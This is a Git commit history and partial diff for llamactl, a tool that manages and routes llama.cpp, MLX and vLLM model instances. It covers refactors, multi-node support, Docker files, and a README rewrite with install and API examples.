214 Commits

Author SHA1 Message Date
34edb8a2e5 Merge pull request #78 from lordmathis/feat/inflight-requests
feat: Wait for inflight requests to finish before shutting down an instance
2025-10-30 18:08:55 +01:00
560850f86d Add shutdown state checks in HTTP handlers 2025-10-30 18:00:59 +01:00
c340439306 Add support for 'shutting_down' state in HealthBadge and health service 2025-10-29 00:09:18 +01:00
77c0e22fd0 Use instance's ServeHTTP in handlers 2025-10-29 00:01:29 +01:00
d65c5ab717 Wait for inflight requests before stopping 2025-10-29 00:00:56 +01:00
2b94244c8a Replace GetProxy with ServeHttp in instance 2025-10-29 00:00:02 +01:00
2e5644db53 Implement inflight request tracking 2025-10-28 23:59:02 +01:00
7ee22fee51 Implement shutting down status 2025-10-28 23:53:11 +01:00
e5baedb776 Merge pull request #76 from lordmathis/feat/import-export
feat: Ad support for instance import and export on frontend
2025-10-27 20:46:48 +01:00
e6205b930e Document import and export features 2025-10-27 20:44:28 +01:00
f9eb424690 Fix concurrent map write issue in MarshalJSON by initializing BackendOptions 2025-10-27 20:36:42 +01:00
5b84b64623 Fix some typescript issues 2025-10-27 20:36:31 +01:00
7813a5f2be Move import instance configuration to InstanceDialog component 2025-10-27 20:17:18 +01:00
a00c9b82a6 Add import functionality for instance configuration from JSON file 2025-10-27 20:11:22 +01:00
cbfa6bd48f Fix export functionality to exclude computed field from JSON output 2025-10-27 19:59:43 +01:00
bee0f72c10 Add export functionality to InstanceCard component 2025-10-27 19:55:07 +01:00
a5d8f541f0 Merge pull request #75 from lordmathis/fix/delete-instance
fix: Prevent restarting instance from getting deleted
2025-10-27 19:27:58 +01:00
dfcc16083c Update test configuration to use 'sh -c "sleep 999999"' command 2025-10-27 19:25:13 +01:00
6ec2919049 Fix instance start simulation in TestUpdateInstance 2025-10-27 19:14:54 +01:00
d6a6f377fc Fix logger race condition 2025-10-27 19:06:06 +01:00
cd9a71d9fc Update test configuration to use 'yes' command instead of 'sleep' 2025-10-27 18:54:20 +01:00
2c4cc5a69a Fix manager tests 2025-10-27 18:47:17 +01:00
b1fc1d2dc8 Add InstancesDir to test configuration for instance management 2025-10-27 18:38:23 +01:00
08c47a16a0 Fix operations tests 2025-10-27 18:35:16 +01:00
219db7abce Move port range validation to config 2025-10-27 18:23:49 +01:00
14131a6274 Remove redundant code 2025-10-27 18:18:25 +01:00
e65f4f1641 Remove unsupported error wrapping from log.Printf 2025-10-27 18:01:58 +01:00
5ef0654cdd Use %w for error wrapping in log messages across multiple files 2025-10-27 17:54:39 +01:00
1814772fa2 Fix instance deletion check to account for restarting status 2025-10-27 17:42:27 +01:00
f1666565d8 Merge pull request #74 from lordmathis/refactor/health-check
refactor: Improve frontend health check
2025-10-26 19:54:38 +01:00
13ef13449c Fix ts type check 2025-10-26 19:52:44 +01:00
777e07752b Fix health service tests 2025-10-26 19:48:07 +01:00
75e7b628ca Remove 'loading' and 'error' states 2025-10-26 19:12:35 +01:00
2a1bebeb24 Improve health checks for instances 2025-10-26 19:05:03 +01:00
f94d05dad2 Add Restarting state 2025-10-26 18:55:05 +01:00
14f4a80c89 Merge pull request #73 from lordmathis/refactor/docs
refactor: Update docs structure and improve content clarity
2025-10-26 17:30:50 +01:00
d768845805 Add Authorization header to curl examples. 2025-10-26 17:28:01 +01:00
4f94f63de3 Minor docs improvements 2025-10-26 17:19:53 +01:00
249ff2a7aa Capitalize godoc tags 2025-10-26 16:49:27 +01:00
6c522a2199 Ad core concepts to quick-start 2025-10-26 16:44:32 +01:00
3ff87f24bd Update swagger docs 2025-10-26 16:36:24 +01:00
eac4f834c0 Update API endpoints in managing instances and quick start documentation 2025-10-26 16:35:58 +01:00
59c954811d Update API routes in godoc 2025-10-26 16:35:42 +01:00
dd40b153d8 Minor docs improvements 2025-10-26 16:10:37 +01:00
c0cd03c75d Refactor troubleshooting documentation for instance management issues 2025-10-26 15:59:17 +01:00
6a840069e1 Fix llama.cpp link in troubleshooting docs 2025-10-26 15:35:51 +01:00
7509722dfa Clarify port and api key assignments 2025-10-26 15:32:40 +01:00
a5e9e01ff4 Update screenshots 2025-10-26 15:25:53 +01:00
7063e83cd2 Improve OpenAPI docs styling 2025-10-26 15:00:30 +01:00
781921fc5a Refactor documentation headings 2025-10-26 14:50:42 +01:00
85e21596d9 Auto generate mkdocs api reference from swagger 2025-10-26 14:43:27 +01:00
975c740272 Add API key security definitions to Swagger documentation 2025-10-26 14:42:55 +01:00
e387280405 Update docs path in contributiong 2025-10-26 14:41:59 +01:00
58c8899fd9 Update import path for API documentation 2025-10-26 14:08:48 +01:00
f98b09ea78 Move apidocs to docs folder 2025-10-26 14:04:53 +01:00
90b65cad79 Update docs navigation 2025-10-26 13:57:16 +01:00
9e88b63fca Flatten the docs structure 2025-10-26 13:55:05 +01:00
52d8c2a082 Simplify README.md 2025-10-26 13:43:44 +01:00
108a977a9c Merge pull request #72 from lordmathis/refactor/handlers
refactor: Extract common helper functions in API handlers
2025-10-26 12:07:42 +01:00
969fee837f Fix instance name retrieval 2025-10-26 11:34:45 +01:00
4e587953d8 Refactor llama server command handlers to use a common execution function 2025-10-26 11:00:10 +01:00
356c5be2c6 Improve comments 2025-10-26 10:34:36 +01:00
836e918fc5 Rename ProxyToInstance to InstanceProxy for clarity in routing 2025-10-26 10:22:37 +01:00
a7593e9a58 Split LlamaCppProxy handler 2025-10-26 10:21:40 +01:00
9259763054 Add getInstance method to handlers 2025-10-26 09:54:24 +01:00
94dce4c9bb Implement helper response handling functions 2025-10-26 00:12:33 +02:00
a3f9213f04 Implement ensureInstanceRunning helper 2025-10-25 23:44:21 +02:00
de5a38e7fd Refactor command parsing 2025-10-25 20:23:08 +02:00
ea6c76cc96 Update multi valued flags in backends 2025-10-25 19:02:46 +02:00
bd6436840e Implement common ParseCommand interface 2025-10-25 18:41:46 +02:00
0a7420c9f9 Merge pull request #71 from lordmathis/refactor/proxy
refactor: Move all proxy handling to instance package
2025-10-25 16:32:32 +02:00
c038aac91b Remove redundant UpdateLast RequestTime calls 2025-10-25 16:09:57 +02:00
7d9b983f93 Don't strip remote llama-cpp proxy prefix 2025-10-25 16:02:09 +02:00
889df3cb79 Add API key header for remote instances in proxy build 2025-10-25 14:14:39 +02:00
ff719f3ef9 Remove remote instance proxy handling from handlers 2025-10-25 14:07:11 +02:00
6a973fae2d Fix tests 2025-10-25 00:14:42 +02:00
58f8861d17 Switch manager to global app config 2025-10-25 00:14:12 +02:00
eff59a86fd Remove proxy, logger and process init from UnmarshalJSON 2025-10-24 23:41:33 +02:00
174d1772d6 Implement remote proxy handling in instance 2025-10-24 23:16:45 +02:00
4bbf45f0b9 Merge pull request #70 from lordmathis/refactor/manager
refactor: Split instance manager into single focus structs
2025-10-22 20:21:15 +02:00
a9fb0d613d Validate instance name in openai proxy 2025-10-22 18:55:57 +02:00
3b8bc658e3 Add name validation to backend handlers 2025-10-22 18:50:51 +02:00
c6053f6afd Remove old validation tests 2025-10-22 18:50:38 +02:00
c794e4f98b Move instance name validation to handlers 2025-10-22 18:40:39 +02:00
0f2c14d3ed Validate instance names to prevent injection attacks 2025-10-22 00:02:23 +02:00
13f3bed5fe Add URL encoding for instance name in API calls in webui 2025-10-21 23:36:26 +02:00
7c2c02ab2f Use url escape instead for instance name param 2025-10-21 23:24:27 +02:00
e0289ff42f Add instance name validation for URL safety and corresponding tests 2025-10-21 23:16:20 +02:00
bc025bbe28 Fix instance name validation 2025-10-21 22:57:23 +02:00
c6ebe47511 Fix path validation false positive 2025-10-21 22:47:41 +02:00
9bb106a1ce Remove deprecated operation mutex in instanceManager 2025-10-21 22:38:00 +02:00
bac18b5626 Unexport factory functions 2025-10-21 22:37:10 +02:00
2b51b4a47f Simplify manager tests 2025-10-21 22:30:08 +02:00
c44712e813 Remove redundant instance manager tests 2025-10-21 22:15:12 +02:00
6afe120a0e Implement more manager tests 2025-10-21 22:07:10 +02:00
4d05fcea46 Improve manager tests 2025-10-21 21:39:01 +02:00
7c64ab9cc6 Make StartInstance and StopInstance idempotent 2025-10-21 18:49:49 +02:00
62c431a041 Merge pull request #69 from lordmathis/dependabot/npm_and_yarn/webui/npm_and_yarn-fd296dbd23
Bump vite from 7.1.5 to 7.1.11 in /webui in the npm_and_yarn group across 1 directory
2025-10-21 18:40:46 +02:00
dependabot[bot]
e5f1b7c056 Bump vite in /webui in the npm_and_yarn group across 1 directory
Bumps the npm_and_yarn group with 1 update in the /webui directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).


Updates `vite` from 7.1.5 to 7.1.11
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v7.1.11/packages/vite)

---
updated-dependencies:
- dependency-name: vite
  dependency-version: 7.1.11
  dependency-type: direct:development
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
2025-10-21 00:23:03 +00:00
a2d4622486 Refactor instance locking mechanism to use per-instance locks for concurrency 2025-10-20 22:59:31 +02:00
d923732aba Delete unused code 2025-10-20 22:27:22 +02:00
1ae28a0b09 Unexport member struct methods 2025-10-20 22:22:09 +02:00
c537bc48b8 Refactor API path handling in remoteManager to use a constant for base path 2025-10-20 22:00:06 +02:00
ffb4b49c94 Split manager into multiple structs 2025-10-20 21:55:50 +02:00
91d956203d Merge pull request #68 from lordmathis/refactor/backend-options
refactor: Move all backend type switching to backends package
2025-10-19 21:04:09 +02:00
b25ad48605 Refactor backend options marshaling/unmarshaling 2025-10-19 20:48:05 +02:00
d8e0da9cf8 Refactor backend options to implement common interface and streamline validation 2025-10-19 20:36:57 +02:00
f42f000539 Implement mlx and cllm tests and remove redundant code 2025-10-19 19:45:31 +02:00
72fe780e31 Simplify instance tests 2025-10-19 19:14:32 +02:00
55a9450077 Fix instance tests 2025-10-19 19:08:38 +02:00
72586fc627 Simplify config tests 2025-10-19 19:06:06 +02:00
6a91fe13e0 Fix local node override tests 2025-10-19 18:59:59 +02:00
51a7ac590e Fix preventing local proxy usage for remote instances 2025-10-19 18:55:56 +02:00
82f4f7beed Ensure local node is defined in LoadConfig by adding default config if missing 2025-10-19 18:47:02 +02:00
ec65ba8968 Add debug files to .gitignore 2025-10-19 18:39:46 +02:00
867380a06d Remove GetBackendSettings method from config 2025-10-19 18:32:05 +02:00
3500971f03 Fix JSON marshaling of backend options by using a pointer 2025-10-19 18:27:22 +02:00
9da2433a7c Refactor instance and manager tests to use BackendOptions structure 2025-10-19 18:07:14 +02:00
55f671c354 Refactor backend options handling and validation 2025-10-19 17:41:08 +02:00
2a7010d0e1 Flatten backends package structure 2025-10-19 15:50:42 +02:00
f209bc88b6 Update .gitignore and launch configuration for dev environment 2025-10-19 15:50:30 +02:00
3fffcc5b37 Merge pull request #67 from lordmathis/refactor/instance-split
refactor: Split instance struct into status, options, logger, proxy and process for better maintenance
2025-10-18 13:23:50 +02:00
851c73f058 Add tests for status change callback and options preservation 2025-10-18 13:19:01 +02:00
8ac4b370c9 Unexport struct methods 2025-10-18 11:25:26 +02:00
a7740000d2 Refactor instance creation to initialize logger, proxy, and process only for local instances 2025-10-18 10:39:04 +02:00
b13f8c471d Split off process struct 2025-10-18 10:28:15 +02:00
3f834004a8 Rename NewInstance to New 2025-10-18 00:34:18 +02:00
113b51eda2 Refactor instance node handling to use a map 2025-10-18 00:33:16 +02:00
7bf0809122 Fix test compilation after merge
Update instance tests to use correct type names:
- CreateInstanceOptions -> Options
- InstanceStatus -> Status

🤖 Generated with [Claude Code](https://claude.ai/code)

Co-Authored-By: Claude <noreply@anthropic.com>
2025-10-17 00:13:53 +02:00
a1ffdb02a4 Merge main into refactor/instance-split
Resolved conflicts in:
- pkg/instance/instance.go: Combined remote detection logic from main with refactored structure
- pkg/manager/manager_test.go: Updated manager initialization to include localNodeName parameter
- pkg/manager/remote_ops.go: Removed stripNodesFromOptions function that was deleted in main
- pkg/manager/remote_ops_test.go: Removed file that was deleted in main

🤖 Generated with [Claude Code](https://claude.ai/code)

Co-Authored-By: Claude <noreply@anthropic.com>
2025-10-17 00:10:09 +02:00
eb5abae173 Merge pull request #66 from lordmathis/fix/disable-node-edit
fix: Prevent node change on update
2025-10-16 22:37:59 +02:00
696a2cb18b Prevent node change on update 2025-10-16 22:35:29 +02:00
e7402f0029 Merge pull request #65 from lordmathis/fix/local-node
fix: Detect local instances based on local node in nodes array
2025-10-16 22:28:01 +02:00
5c9a397746 Fix get local proxy 2025-10-16 22:11:29 +02:00
e97ca727d1 Clarify node configuration in docs 2025-10-16 21:50:06 +02:00
9f3c01384b Remove stripNodesFromOptions function 2025-10-16 21:29:27 +02:00
c5097e59be Fix local instance detection 2025-10-16 21:26:04 +02:00
4b30791be2 Refactor instance options structure and related code 2025-10-16 20:53:24 +02:00
a96ed4d797 Fix status json tag static check 2025-10-16 20:22:12 +02:00
5afc22924f Refactor Status struct 2025-10-16 20:15:22 +02:00
e0ec00d141 Remove rendundant instance prefix from status 2025-10-16 19:40:03 +02:00
80ca0cbd4f Rename Process to Instance 2025-10-16 19:38:44 +02:00
964c6345ef Refactor backend host/port retrieval and remove redundant code for health checks 2025-10-14 22:16:26 +02:00
92a76bc84b Move proxy to separate struct 2025-10-14 22:01:09 +02:00
02909c5153 Remove redundant instance prefix from logger 2025-10-14 19:46:43 +02:00
ef3478e2a3 Move logging to separate struct 2025-10-14 19:32:15 +02:00
cf20f304b3 Merge pull request #61 from lordmathis/fix/docs-formatting
fix: Add MkDocs hook to fix line endings in markdown files
2025-10-09 23:28:09 +02:00
72eba48b80 Add MkDocs hook to fix line endings in markdown files 2025-10-09 23:23:17 +02:00
c3037f914d Merge pull request #60 from lordmathis/lordmathis-patch-1
Update docs.yaml
2025-10-09 22:31:38 +02:00
81266b4bc4 Update docs.yaml 2025-10-09 22:29:23 +02:00
a31af94e7b Merge pull request #59 from lordmathis/feat/multi-host
feat: Implement multi node support
2025-10-09 22:23:27 +02:00
9ee0a184b3 Re-validate instance name in DeleteInstance for improved security 2025-10-09 22:18:53 +02:00
5436c28a1f Add instance name validation before deletion for security 2025-10-09 22:10:40 +02:00
73b9dd5bc7 Rename workflows for consistency 2025-10-09 21:53:14 +02:00
f61e8dad5c Add User Docs badge to README 2025-10-09 21:51:38 +02:00
ab2770bdd9 Add documentation for remote node deployment and configuration 2025-10-09 21:50:39 +02:00
e7a6a7003e Skip remote instances in checkAllTimeouts and EvictLRUInstance methods 2025-10-09 21:13:38 +02:00
2b950ee649 Implement updateLocalInstanceFromRemote to preserve Nodes field when syncing remote instance data 2025-10-09 20:39:21 +02:00
b965b77c18 Prevent remote instances from using local proxy in GetProxy method 2025-10-09 20:24:54 +02:00
8a16a195de Fix getting remote instance logs 2025-10-09 20:22:32 +02:00
9684a8a09b Enhance instance management to preserve local state for remote instances 2025-10-09 19:34:52 +02:00
9d5f01d4ae Auto-select first node in InstanceSettingsCard if none is selected 2025-10-09 19:13:58 +02:00
e281708b20 Enhance auto-start logic to differentiate between remote and local instances 2025-10-09 18:56:23 +02:00
8d9b0c0621 Initialize timeProvider and logger in UnmarshalJSON for Process 2025-10-09 18:56:12 +02:00
6c1a76691d Improve cleanup of options in InstanceDialog to skip empty strings and arrays 2025-10-09 18:49:36 +02:00
5d958ed283 Fix backend_options cleanup to exclude empty arrays in InstanceDialog 2025-10-09 18:38:33 +02:00
56b95d1243 Refactor InstanceSettingsCard and API types to use NodesMap 2025-10-08 19:52:39 +02:00
688b815ca7 Add LocalNode configuration 2025-10-08 19:43:53 +02:00
7f6725da96 Refactor NodeConfig handling to use a map 2025-10-08 19:24:24 +02:00
3418735204 Add stripNodesFromOptions function to prevent routing loops in remote requests 2025-10-07 20:27:31 +02:00
2f1cf5acdc Refactor CreateRemoteInstance and UpdateRemoteInstance to directly use options parameter in API requests 2025-10-07 19:57:21 +02:00
01380e6641 Update instance manager tests to use empty NodeConfig slice 2025-10-07 19:18:13 +02:00
6298b03636 Refactor RemoteOpenAIProxy to use cached proxies and restore request body handling 2025-10-07 18:57:08 +02:00
aae3f84d49 Implement caching for remote instance proxies and enhance proxy request handling 2025-10-07 18:44:23 +02:00
554796391b Remove test config file 2025-10-07 18:05:30 +02:00
16b28bac05 Merge branch 'main' into feat/multi-host 2025-10-07 18:04:24 +02:00
1892dc8315 Merge pull request #57 from BobbyL2k/feat/llama-cpp-proxy
feat: Proxy llama.cpp API endpoints via `/llama-cpp/{name}/`
2025-10-06 20:23:44 +02:00
Anuruth Lertpiya
997bd1b063 Changed status code to StatusBadRequest (400) if requested invalid model name. 2025-10-05 14:53:20 +00:00
Anuruth Lertpiya
fa43f9e967 Added support for proxying llama.cpp native API endpoints via /llama-cpp/{name}/ 2025-10-05 14:28:33 +00:00
db9eebeb8b Merge pull request #56 from lordmathis/fix/body-already-read
Fix double read of json response when content-length header is missing
2025-10-04 22:28:22 +02:00
bd062f8ca0 Mock Response.clone for tests 2025-10-04 22:22:25 +02:00
8ebdb1a183 Fix double read of json response when content-length header is missing 2025-10-04 22:16:28 +02:00
7272212081 Merge pull request #55 from lordmathis/fix/auto-restart
fix: Set status to Stopped for instances with auto-restart disabled
2025-10-04 21:45:12 +02:00
035e184789 Merge branch 'main' into fix/auto-restart 2025-10-04 21:22:50 +02:00
d15976e7aa Implement auto-stop for instances with auto-restart disabled and add corresponding tests 2025-10-04 21:17:55 +02:00
4fa75d9801 Merge pull request #52 from BobbyL2k/feat/config-cors-headers
feat: Added support for configuring access-control-request-headers for CORS
2025-10-04 20:45:27 +02:00
Anuruth Lertpiya
0e1bc8a352 Added support for configuring CORS headers 2025-10-04 09:13:40 +00:00
b728a7c6b2 Fix fetchNodes call to ensure proper handling of promise 2025-10-03 10:53:29 +02:00
a491f29483 Add node selection functionality to InstanceSettingsCard and define Node API 2025-10-02 23:18:33 +02:00
670f8ff81b Split up handlers 2025-10-02 23:11:20 +02:00
da56456504 Add node management endpoints to handle listing and retrieving node details 2025-10-02 22:51:41 +02:00
c30053e51c Enhance instance loading to support remote instances and handle node configuration 2025-10-01 22:59:45 +02:00
347c58e15f Enhance instance manager to persist remote instances and update tracking on modifications 2025-10-01 22:58:57 +02:00
2ed67eb672 Add remote instance proxying functionality to handler 2025-10-01 22:17:19 +02:00
0188f82306 Implement remote instance creation and deletion in instance manager 2025-10-01 22:05:18 +02:00
e0f176de10 Enhance instance manager to support remote instance management and update related tests 2025-10-01 20:25:06 +02:00
2759be65a5 Add remote instance management functionality and configuration support 2025-09-30 21:09:05 +02:00
1e5e86d2c3 Merge pull request #50 from lordmathis/feat/docker-image
feat: Add Dockerfiles for running llamactl in docker
2025-09-29 21:26:23 +02:00
25d3d70707 Update README and installation guide to reflect Dockerfile paths and add source build instructions 2025-09-29 21:18:13 +02:00
e54cfd006d Add Dockerfile for building from source 2025-09-29 21:17:40 +02:00
7d39e7ee86 Move docker stuff to a dedicated folder 2025-09-29 21:16:51 +02:00
222d913b4a Merge pull request #49 from BobbyL2k/feat/reverse-proxy-support
Added support for serving behind a reverse proxy
2025-09-29 20:32:11 +02:00
Anuruth Lertpiya
03a7a5d139 Update configration.md with reverse proxy related information 2025-09-29 13:54:15 +00:00
Anuruth Lertpiya
e50660c379 Fixed broken webui tests 2025-09-29 13:38:24 +00:00
Anuruth Lertpiya
5906d89f8d Added support for serving behind a reverse proxy
- Added support for specifying response headers for each backend
  - Allowing users to set `X-Accel-Buffering: no` to disable buffering for streaming responses in nginx
  - Updated `configuration.md` to document the new configuration options
- Modified Vite config to build with `base: "./"`, making assets be accessed via relative paths
- Updated API_BASE to use `document.baseURI`, allowing API calls to be made relative to the base path
2025-09-29 12:43:10 +00:00
cb2d95139f Setup data dir in Docker and docker-compose 2025-09-28 22:17:38 +02:00
889a8707e7 Refactor Dockerfile and docker-compose to streamline environment variable configuration and remove redundant commands 2025-09-28 22:17:38 +02:00
070c91787d Add environment variable for llamactl command in Dockerfile 2025-09-28 22:17:38 +02:00
169ee422ec Update README and installation guide to clarify Docker support and CUDA configuration 2025-09-28 22:17:38 +02:00
bb0176b7f5 Update Dockerfile to use server-cuda image for improved performance 2025-09-28 22:17:38 +02:00
291ec7995f Update Docker run commands to use cached directories and remove unnecessary environment variables 2025-09-28 22:17:38 +02:00
b940b38e46 Initial support for docker 2025-09-28 22:17:38 +02:00
92cb57e816 Merge pull request #48 from lordmathis/fix/command-environment
fix: Pass host environment to instances
2025-09-28 21:40:50 +02:00
0ecd55c354 Start with host environment for instances 2025-09-28 21:37:48 +02:00
101 changed files with 11506 additions and 5734 deletions

45
.dockerignore Normal file
View File

@@ -0,0 +1,45 @@
# Git and version control
.git/
.gitignore
# Documentation
*.md
docs/
# Development files
.vscode/
.idea/
# Build artifacts
webui/node_modules/
webui/dist/
webui/.next/
*.log
*.tmp
# Data directories
data/
models/
logs/
# Test files
*_test.go
**/*_test.go
# CI/CD
.github/
# Local configuration
llamactl.yaml
config.yaml
.env
.env.local
# OS files
.DS_Store
Thumbs.db
# Backup files
*.bak
*.backup
*~

View File

@@ -1,4 +1,4 @@
name: Build and Deploy Documentation
name: User Docs
on:
push:

10
.gitignore vendored
View File

@@ -34,4 +34,12 @@ go.work.sum
node_modules/
dist/
__pycache__/
__pycache__/
site/
# Dev config
llamactl.dev.yaml
# Debug files
__debug*

2
.vscode/launch.json vendored
View File

@@ -12,7 +12,7 @@
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
"LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml"
},
}
]

View File

@@ -86,7 +86,7 @@ go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
swag init -g cmd/server/main.go
```
## Pull Request Guidelines

179
README.md
View File

@@ -1,108 +1,35 @@
# llamactl
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg) ![User Docs](https://github.com/lordmathis/llamactl/actions/workflows/docs.yaml/badge.svg)
**Unified management and routing for llama.cpp, MLX and vLLM models with web dashboard.**
## Features
### 🚀 Easy Model Management
- **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
- **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
- **State Persistence**: Ensure instances remain intact across server restarts
### 🔗 Universal Compatibility
- **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Support**: Run backends in containers
### 🌐 User-Friendly Interface
- **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
- **API Key Authentication**: Separate keys for management vs inference access
### ⚡ Smart Operations
- **Instance Monitoring**: Health checks, auto-restart, log management
- **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
- **Environment Variables**: Set custom environment variables per instance for advanced configuration
📚 **[Full Documentation →](https://llamactl.org)**
![Dashboard Screenshot](docs/images/dashboard.png)
## Features
**🚀 Easy Model Management**
- **Multiple Models Simultaneously**: Run different models at the same time (7B for speed, 70B for quality)
- **Smart Resource Management**: Automatic idle timeout, LRU eviction, and configurable instance limits
- **Web Dashboard**: Modern React UI for managing instances, monitoring health, and viewing logs
**🔗 Flexible Integration**
- **OpenAI API Compatible**: Drop-in replacement - route requests to different models by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Ready**: Run backends in containers with full GPU support
**🌐 Distributed Deployment**
- **Remote Instances**: Deploy instances on remote hosts
- **Central Management**: Manage everything from a single dashboard with automatic routing
## Quick Start
```bash
# 1. Install backend (one-time setup)
# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
# For MLX on macOS: pip install mlx-lm
# For vLLM: pip install vllm
# Or use Docker - no local installation required
# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# 3. Start the server
llamactl
# Access dashboard at http://localhost:8080
```
## Usage
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Set model path and backend-specific options
5. Configure environment variables if needed (optional)
6. Start or stop the instance
### Or use the REST API:
```bash
# Create llama.cpp instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
# Create MLX instance (macOS)
curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
# Create vLLM instance with environment variables
curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}, "environment": {"CUDA_VISIBLE_DEVICES": "0,1", "NCCL_DEBUG": "INFO"}}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
-H "Authorization: Bearer your-key" \
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```
## Installation
### Option 1: Download Binary (Recommended)
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
1. Install a backend (llama.cpp, MLX, or vLLM) - see [Prerequisites](#prerequisites) below
2. [Download llamactl](#installation) for your platform
3. Run `llamactl` and open http://localhost:8080
4. Create an instance and start inferencing!
## Prerequisites
@@ -147,9 +74,9 @@ pip install vllm
# Or use Docker - no local installation required
```
## Docker Support
### Docker Support
llamactl supports running backends in Docker containers - perfect for production deployments without local backend installation. Simply enable Docker in your configuration:
llamactl can run backends in Docker containers, eliminating the need for local backend installation:
```yaml
backends:
@@ -161,9 +88,58 @@ backends:
enabled: true
```
**Requirements:** Docker installed and running. For GPU support: nvidia-docker2 (Linux) or Docker Desktop with GPU support.
## Installation
For detailed Docker configuration options, see the [Configuration Guide](docs/getting-started/configuration.md).
### Option 1: Download Binary (Recommended)
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Docker (No local backend installation required)
```bash
# Clone repository and build Docker images
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
mkdir -p data/llamacpp data/vllm models
# Build and start llamactl with llama.cpp CUDA backend
docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
# Build and start llamactl with vLLM CUDA backend
docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
# Build from source using multi-stage build
docker build -f docker/Dockerfile.source -t llamactl:source .
```
**Note:** Dockerfiles are configured for CUDA. Adapt base images for other platforms (CPU, ROCm, etc.).
### Option 3: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
## Usage
1. Open http://localhost:8080
2. Click "Create Instance"
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Configure your model and options (ports and API keys are auto-assigned)
5. Start the instance and use it with any OpenAI-compatible client
## Configuration
@@ -174,6 +150,7 @@ server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
allowed_headers: ["*"] # Allowed CORS headers (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
@@ -184,7 +161,7 @@ backends:
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
args: ["run", "--rm", "--network", "host", "--gpus", "all", "-v", "~/.local/share/llamactl/llama.cpp:/root/.cache/llama.cpp"]
environment: {} # Environment variables for the container
vllm:
@@ -194,7 +171,7 @@ backends:
docker:
